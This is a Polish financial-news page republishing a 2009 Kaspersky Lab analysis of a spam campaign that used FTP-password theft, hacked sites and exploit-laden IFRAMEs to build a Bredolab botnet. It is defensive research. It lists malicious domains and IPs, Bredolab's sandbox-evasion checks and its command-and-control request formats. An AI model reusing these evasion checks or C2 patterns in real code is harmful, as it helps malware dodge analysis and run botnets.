PRNews.pl - banki, karty, konta oraz marketing i public relations

Najświeższe informacje z PRNews.pl w Twojej skrzynce!

Codziennie aktualne wiadomości ze świata finansów.

Zapisz się na nasz Newsletter ​i bądź na bieżąco z nowościami z branży!

  • Raporty
  • Instytucje
    • Aion Bank
    • Alior Bank
    • Bank BPS
    • Bank Millennium
    • Bank Ochrony Środowiska
    • Bank Pekao SA
    • Bank Pocztowy
    • Banki spółdzielcze
    • BGK
    • Biuro Informacji Kredytowej
    • BNP Paribas
    • Citi Handlowy
    • Compensa
    • Credit Agricole
    • Deutsche Bank
    • DNB
    • EuropAssistance
    • ING Bank Śląski
    • KIR
    • Klarna
    • Link4
    • Mastercard
    • mBank
    • Mondial Assistance
    • mPay
    • Nationale-Nederlanden
    • Nest Bank
    • PKO BP
    • PKO Leasing
    • Plus Bank
    • PolCard from Fiserv
    • Polski Standard Płatności
    • Pru
    • PZU
    • Raiffeisen Digital Bank
    • Revolut
    • Santander Bank Polska
    • Santander Consumer Bank
    • SGB
    • Standard Chartered Polska
    • Toyota Bank Polska
    • Trade Republic
    • Twisto
    • UniCredit
    • VeloBank
    • Visa
    • Volkswagen Bank Oddział Polska
    • Warta
  • Produkty
    • Bankowość internetowa
    • Bankowość mobilna
    • Oszczędzanie
    • Bezpieczeństwo
    • Karty
    • Kredyty
    • Konta
    • Płatności mobilne
    • Ubezpieczenia
  • Analizy
  • Kariera w finansach
  • Szkolenia
  • Forum
  • Newsletter
PRNews.plWiadomościMarketing i PRFabryka pieniedzy – Kaspersky Lab o botnetach i nie tylko

Fabryka pieniedzy – Kaspersky Lab o botnetach i nie tylko

Marketing i PR 27.10.2009 (06:42) artykuł nadesłany

Artykuł ten stanowi analizę jednej wiadomości spamowej i przedstawia metody stosowane dzisiaj przez cyberprzestępców w celu tworzenia botnetów i przeprowadzania masowych wysyłek spamowych. Opisane metody i techniki są bez wątpienia nielegalne, a cyberprzestępcy wykorzystują je w jednym celu: aby się wzbogacić.

Spam

Na początku lata 2009 roku laboratorium filtrowania zawartości firmy Kaspersky Lab zaczęło otrzymywać e-maile, które na pierwszy rzut oka wydawały się typowymi wiadomościami spamowymi. E-maile promowały leki i wykorzystywały standardowy format, który zawierał HTML oraz osadzone obrazy:


Przykład spamu wysłanego do [email protected]

Jednak wiadomości te posiadały jedną cechę, która wyróżniała je na tle innego spamu. Zawarte w nich odsyłacze nie prowadziły do stron spamerów, ale stron HTML-owych na legalnych portalach.

Domeny w odsyłaczach różniły się w zależności od wiadomości, jednak ścieżka do serwera była zawsze taka sama: “1/2/3/4/buy.html.”

 
Tekst źródłowy e-maila zawierającego odsyłacze do legalnych stron internetowych

Wszystkie strony, do których prowadziły odsyłacze, zawierały jednowierszowy plik HTML ze znacznikiem META refresh. Znacznik ten był wykorzystywany do przekierowywania użytkownika na inną stronę – w tym przypadku, sklep internetowy sprzedający leki reklamowane przez spamerów.


 

Tekst źródłowy stron internetowych, które przekierowują użytkowników na stronę spamerską

 
Strona, na jaką zostali przekierowani użytkownicy


Jedną z metod wykorzystywanych do wykrywania spamu jest czarna lista nazw domen, do których prowadzą odsyłacze w wiadomościach spamowych. Pozwala to wykrywać wszystkie wiadomości wysyłane w masowych wysyłkach, niezależnie od tekstu w treści wiadomości. Jednak w tym przypadku, domeny, do których prowadziły odsyłacze w wiadomości, nie mogły zostać umieszczone na czarnej liście, ponieważ odsyłacze prowadziły do legalnych stron internetowych. Co więcej, każdego dnia nasi analitycy identyfikowali kolejnych 10 nowych domen. Ta metoda obchodzenia filtrów spamowych znana jest spamerom od wielu lat, jest jednak rzadko wykorzystywana, ponieważ wiąże się z wyższymi kosztami niż zakup nowych domen.

Strony internetowe, do których prowadziły odsyłacze, zostały prawdopodobnie zhakowane i były wykorzystywane przez cyberprzestępców do przekierowywania użytkowników na strony spamerów. Wciąż jednak nie wiedzieliśmy, w jaki sposób cyberprzestępcy zdołali włamać się na tak wiele stron.

Strony internetowe

Włamanie się przy użyciu standardowych metod nie byłoby możliwe w przypadku większości z tych stron. Szybka analiza zhakowanych zasobów nie ujawniła żadnych wspólnych luk w zabezpieczeniach. Do stworzenia tych stron nie wykorzystano również tych samych technologii itd. Ponadto, większość z nich nie zawierała żadnych skryptów, a jedynie HTML. Jedyną rzeczą, jaka je łączyła, był folder zawierający plik „buy.html”. Zawierał on znacznik HTML, który przekierowywał użytkowników do sklepu internetowego spamerów, w którym sprzedawane były lekarstwa.

Jednak dogłębna analiza jednej ze zhakowanych stron ujawniła dobrze ukrytą ramkę IFRAME, która przekierowywała do strony o nazwie b9g.ru. Podziałało to jak światełko ostrzegawcze: IFRAME odsyłający do podejrzanych stron internetowych jest często wykorzystywany przez cyberprzestępców do infekowania komputerów przy użyciu exploitów.

 
Zhakowana strona


Analiza ujawniła, że b9g.ru znajduje się pod pięcioma różnymi adresami IP:

77.37.20.130
90.156.144.78
77.37.19.173
77.37.19.179
oraz 77.37.19.205.

Po zebraniu informacji o domenach, które również zostały zarejestrowane pod tymi adresami, zdołaliśmy zidentyfikować domeny, gdzie adresy były wykorzystywane do umieszczenia ramki IFRAME na zhakowanych stronach: a31.ru, b5r.ru, b5z.ru, b7p.ru, b8o.ru, b9g.ru, c6y.ru, c8k.at, f5l.at, f5x.at itd. Potwierdziło to nasze podejrzenia odnośnie zagrożenia, jakie stanowi ramka IFRAME wykryta na zhakowanej stronie.

Exploity

Kolejnym krokiem było zidentyfikowanie, jakie programy były pobierane na komputery użytkowników ze strony http://b9g.ru:****/*****.php. Tak jak się spodziewaliśmy, już po pierwszym odwiedzeniu tej strony na nasz komputer zostały pobrane exploity wraz z index.php. Cyberprzestępcy wykorzystali szereg różnych luk w zabezpieczeniach oprogramowania; największe zagrożenie stanowiły exploity wykorzystujące luki w zabezpieczeniach PDF.

 

 
Zaszyfrowany i niezaszyfrowany index.php

Bot

Dzięki wykorzystaniu luk w zabezpieczeniach pobrany został program Backdoor.Win32.Bredolab. Szkodnik ten wykorzystuje technologie rootkit, pobiera i instaluje inne szkodliwe programy.

 
Fragment zrzutu zawartości pamięci rootkita downloadera


Bredolab przeciwdziała próbom uruchomienia go w piaskownicy, sprawdzając, czy istnieje

  • Nazwa użytkownika, taka jak: USER, user, CurrentUser, Sandbox;
  • Nazwa komputera SANDBOX;
  • Ciąg VBOX w HKLMHARDWAREDescriptionSystemSystemBiosVersion
  • Następujące wartości w kluczu ProductID w HKLMMicrosoftWindowsCurrentVersion:
    • 55274-640-2673064-23950 (JoeBox)
    • 76487-644-3177037-23510 (CWSandbox)
    • 76487-337-8429955-22614 (Anubis)

Jeżeli jeden z tych warunków zostanie spełniony, szkodliwy program przestanie działać.

Bredolab przestaje również działać, jeżeli na zainfekowanym komputerze jest zainstalowany COMODO Firewall.

W przeciwnym razie Bredolab kopiuje się do %Temp%~TM27FB4A.TMP, wstrzykuje swój kod do explorer.exe, uruchamia nowy wątek i przenosi się do %Temp%~TM%TempName%. Następnie bot uruchamia się w tym wątku, a pierwotny proces zostaje zakończony.

Po tym, jak bot skutecznie połączy się z centrum kontroli, wysyła żądanie GET:

GET /l/controller.php?action=bot&entity_list={liczby oddzielone przecinkami &uid=11&first={0|1}&guid={VolumeSerialNumber} &uid=11&first={0|1}&guid={VolumeSerialNumber}&rnd=6293712

W odpowiedzi serwer przekazuje zaszyfrowane programy do bota. Programy te mogą następnie zostać zapisane do nowego pliku, %Windows%Tempwpv%rand_number%.exe, który jest następnie uruchamiany, lub do nowo stworzonego procesu svchost.

 
Przykład zaszyfrowanej wiadomości z centrum kontroli

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Jul 2009 17:08:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 55709
Entity-Info: 1241530597:32768:1;1246898982:22941:2;
Rnd: 982101
Magic-Number:
32|1|187:55:66:132:143:54:243:114:97:146:132:5:192:141:199:113:160:130:101:
167:50:61:32:107:127:128:84:144:169:61:158:100:…

Odpowiedź centrum kontroli. Klucz deszyfrujący znajduje się w polu Magic Number.

Bot informuje właściciela botnetu o swoich działaniach, wysyłając żądanie GET:
GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11& entity={number:unique_start|
unique_failed|repeat_start|repeat_failed;number:…}

Trojany kradnące hasła

Po tym, jak bot połączy się z centrum kontroli, zainfekowany system pobiera i instaluje program o nazwie Trojan-PSW.Win32.Agent.mzh. Szkodnik ten kradnie hasła do klientów FTP.

 
Odszyfrowany kod trojana kradnącego hasła do klienta FTP


Skradzione hasła do klienta FTP są następnie wysyłane na następujący adres:

 
Lokalizacja serwera, na który są wysyłane skradzione hasła


Sytuacja była jasna. Cyberprzestępcy nie próbowali włamywać się na strony internetowe przy użyciu wstrzykiwania SQL lub exploitów atakujących silniki stron – zamiast tego kradli po prostu hasła do klientów FTP w celu przejęcia kontroli nad zawartością stron.

Według informacji o trojanie Trojan-PSW.Win32.Agent.mzh zamieszczonych na forach dla hakerów, wynaleziono system umożliwiający kradzież haseł do stron; trojan ten stanowił część tego systemu, który można było kupić za 2 000 dolarów.

Pobieranie innych szkodliwych programów

Tydzień później, centrum kontroli botnetu wydało polecenie pobrania botów w celu wysyłania spamu: wśród botów znajdowały się tak znane szkodniki, jak Rustock (Backdoor.Win32.HareBot) i Pushdo(Backdoor.Win32.NewRest.aq).

Po upływie kolejnego tygodnia na zainfekowanych maszynach zostały zainstalowane również programy z rodziny Koobface oraz fałszywy program antywirusowy.

Plan ataku

Niewielkie badanie, które rozpoczęło się od spamu wysłanego na adres [email protected], ujawniło, w jaki sposób działają cyberprzestępcy:

 
Etapy włamywania się na strony internetowe i przeprowadzania masowych wysyłek spamowych


System ten pokazuje technologie i techniki często stosowane do tworzenia botnetów wykorzystywanych do wysyłania masowych wysyłek spamowych:

  1. Włamanie się do legalnych zasobów.
  2. Umieszczenie na zhakowanych portalach stron, które przekierowują do stron spamerów.
  3. Umieszczenie na zhakowanych portalach odsyłaczy do exploitów.
  4. Tworzenie botnetu z komputerów, które zostały zainfekowane w wyniku odwiedzenia zhakowanych stron.
  5. Kradzież haseł użytkowników do stron internetowych.
  6. Pobieranie botów spamowych w celu przeprowadzania masowych wysyłek i innych szkodliwych programów na komputery w botnecie.

Metody te zapewniają płynne działanie procesu, który w idealnym świecie cyberprzestępczym jest cykliczny.

Wnioski

Wysyłanie spamu zawierającego odsyłacze do zhakowanych i zainfekowanych stron internetowych jest powszechną praktyką. Co godzinę identyfikujemy dziesiątki nowych adresów tego typu.


Przykład wiadomości e-mail zawierającej odsyłacz do strony na zhakowanym portalu internetowym

 
Tekst źródłowy sekcji HTML-owej e-maila


Odsyłacz (http://…/1.html) wskazuje na stronę na zhakowanym portalu internetowym, która zawiera znacznik przekierowujący do sklepu internetowego sprzedającego lekarstwa.

Spamerzy stosują tego rodzaju taktyki w wielu różnych wiadomościach e-mail, zmieniając nazwę strony, do której są przekierowywani użytkownicy i dostarczając szereg różnych exploitów przy użyciu IFRAME. Jednak główny cel jest zawsze taki sam: wszystkie stosowane technologie są wykorzystywane do zarabiania pieniędzy.

I jeszcze jedno…

W lipcu tego roku pojawiły się informacje o włamaniu się na stronę Torrentreactor. Cyberprzestępcy wykorzystali znaczniki, które przekierowywały do strony zawierającej exploity; było jasne, że do włamania się wykorzystano szkodliwy program stworzony w celu kradzieży haseł do FTP-a.

 
Fragment zhakowanej strony Torrentreactor.net

Jest to kolejny przykład wielu podobnych przypadków włamań hakerskich.

Źródło: Kaspersky Lab

internet it 2009-10-27
Redakcja PRNews.pl
Tagi: internet it

Sprawdź także:

a 0 Pekao Faktoring na szczycie. Spółka liderem polskiego rynku w 2025 roku
02.02.2026 (11:42)

Pekao Faktoring na szczycie. Spółka liderem polskiego rynku w 2025 roku

Pekao Faktoring zakończył 2025 rok na pozycji lidera polskiego rynku faktoringowego, osiągając obroty na poziomie …

a 0 System kaucyjny poza sklepami. Zwrot kaucji trafi bezpośrednio na kartę płatniczą
Wojciech BoczońWojciech Boczoń
02.02.2026 (09:25)

System kaucyjny poza sklepami. Zwrot kaucji trafi bezpośrednio na kartę płatniczą

Spółka Czysta Polska Recyklomaty nawiązała współpracę z Fiserv Polska, właścicielem marki PolCard, w celu wdrożenia …

a 0 Trzeci gracz na polskim rynku biżuterii płatniczej - RingPay
Wojciech BoczońWojciech Boczoń
01.02.2026 (08:33)

Trzeci gracz na polskim rynku biżuterii płatniczej - RingPay

W styczniu oferta płatniczych wearables w Polsce powiększyła się o brytyjski fintech RingPay. To rozwiązanie oparte …

a Kariera w finansach 0 Patryk Krajewski obejmuje stanowisko Country Managera Twisto w Polsce
01.02.2026 (08:21) – informacja prasowa

Patryk Krajewski obejmuje stanowisko Country Managera Twisto w Polsce

Patryk Krajewski dołączył do Twisto jako nowy Country Manager, obejmując stanowisko w styczniu 2026 r. Rola Country …

a 0 Blik dostępny w technologii Tap on Any Device w Viva.com
30.01.2026 (05:22) – informacja prasowa

Blik dostępny w technologii Tap on Any Device w Viva.com

Wdrożenie płatności BLIKIEM w technologii Viva.com Tap on Any Device pozwala polskim przedsiębiorcom przyjmować …

a Analizy 0 Padają ostatnie reduty depozytów na 7%
30.01.2026 (05:19) – informacja prasowa

Padają ostatnie reduty depozytów na 7%

Styczeń to nie był dobry miesiąc dla oszczędzających. Co prawda RPP tym razem nie obniżyła stóp procentowych, ale …

PRNews.pl

Zobacz również

Niemiecki bank zamyka setki kont przez brak zgody na nowy cennik. W Polsce wystarczy „milcząca zgoda”

Niemiecki bank zamyka setki kont przez brak zgody na nowy cennik. W Polsce wystarczy „milcząca zgoda”

Niemiecki bank Saalesparkasse zdecydował się na drastyczny…

Zdjęcie potrzebne do przelewu. PKO BP uruchomił nowe zabezpieczenie w IKO

Zdjęcie potrzebne do przelewu. PKO BP uruchomił nowe zabezpieczenie w IKO

PKO BP uruchomił w aplikacji IKO dodatkową…

Codziennie ginie 320 dokumentów tożsamości. Banki biją na alarm przed plagą wyłudzeń kredytów

Codziennie ginie 320 dokumentów tożsamości. Banki biją na alarm przed plagą wyłudzeń kredytów

Choć Polacy coraz rzadziej zgłaszają utratę dokumentów…

UniCredit promuje konto za „0 zł bez warunków”. Dodaje 9 miesięcy Spotify Premium

UniCredit promuje konto za „0 zł bez warunków”. Dodaje 9 miesięcy Spotify Premium

UniCredit promuje konto osobiste w pakiecie Easy…

Łotwa szykuje banki na kryzys z Rosją. Karty „offline” i bankomaty z awaryjnym zasilaniem

Łotwa szykuje banki na kryzys z Rosją. Karty „offline” i bankomaty z awaryjnym zasilaniem

Łotwa wdrożyła rozwiązania, które mają utrzymać dostęp…

O tym mówią bankowcy

Ostatnie komentarze

avatar komentującego

Robert Koch:

rewelacja! Tego brakowało. Brawo dla tej firmy …

czw., 29 sty 2026 (11:55) • Tpay wprowadza płatności Blik Level 0 dla użytkowników platformy Shopify

avatar komentującego

DarkZ:

I w ten sposób bank z ligi światowej spadł do podwórkowej …

pon., 12 sty 2026 (09:00) • Santander Bank Polska dołączył do Erste Group

avatar komentującego

daria owocna:

Nie tylko oni mają problem ;) Jestem starsza, a też ciężko z kasą …

śr., 17 gru 2025 (14:38) • Jak Gen Z radzi sobie z dorosłością? 1/3 z nich już ma długi

avatar komentującego

MalmoMind:

Żadna nowość. To samo Sobieraj zrobil w Aliorze… Tylko jak potem trzeba było …

wt., 18 lis 2025 (12:09) • UniCredit wywraca stolik. Wszystkie najważniejsze usługi za darmo i bez „gwiazdek”

avatar komentującego

MalmoMind:

Bla bla … spadek Klientów Indywidualnych pominięty … …

niedz., 9 lis 2025 (22:50) • 696 mln zł zysku netto Grupy Kapitałowej BNP Paribas Bank Polska w III kw. 2025 r.

  • SMART Bankier
  • Kredyt konsolidacyjny
  • Pożyczki na raty
  • Konto firmowe
  • Kurs inwestowania
  • Kalkulator brutto netto
  • Kalkulator kredytu gotówkowego
  • Kalkulator zdolności kredytowej
  • Rozlicz najem w PIT-28
  • pit 37 online na pit.pl
  • Rozliczenie pit
  • Program pit
  • Pit 11
  • Promocje bankowe
  • Promocje Pekao S.A.
  • Promocje BNP Paribas
  • Promocje Citi Handlowy
  • Promocje Alior Bank
  • Promocje Santander Bank
  • Promocje PKO BP
  • Promocje Millenium
  • Promocje ING Bank Śląski
  • Promocje mBank
  • Promocje Velobank
  • Promocje Nest Bank
  • O nas
  • Kontakt
  • Reklama
  • Newsletter
  • Prześlij informację
  • RSS
  • zgarnijpremie.pl
Bonnier Business Polska Bankier.pl – Portal Finansowy – Rynki, Twoje finanse, Biznes PIT.pl -Podatki dla małych firm i osób fizycznych, rozliczenia roczne Systempartnerski.pl - system afiliacyjny Bankier.pl PRNews.pl - banki, karty, konta oraz marketing i public relations Mambiznes.pl - Pomysł na biznes, Własna firma, Biznes plan Dyskusja.biz - Blogi o biznesie, artykuły biznesowe Puls Biznesu pb.pl - rynek, akcje, spółka, przedsiębiorca, budżet Pulsmedycyny.pl - Portal lekarzy i pracowników służby zdrowia Pulsfarmacji.pl - Portal aptekarzy, techników i pracowników sektora farmaceutycznego
© 2008 − 2026 PRNews.pl. Korzystanie z portalu oznacza akceptację regulaminu. Informacja o cookies. Polityka prywatności

Bezpłatny newsletter PRNews.pl

  • PRNews.pl to najbardziej opiniotwórczy serwis w branży bankowej. Przekonaj się dlaczego!
  • Codziennie rano otrzymasz skrót najważniejszych informacji ze świata finansów
  • Dzięki temu będziesz zawsze wiedział o nowych produktach, promocjach i usługach bankowych, ubezpieczeniowych i inwestycyjnych
  • Aktualne wiadomości z prasy i z samych instytucji finansowych - zupełnie bezpłatnie, wprost na twoją skrzynkę mailową
Zapisz się na newsletter:

Dołącz już dziś do niemal 38 tys. odbiorców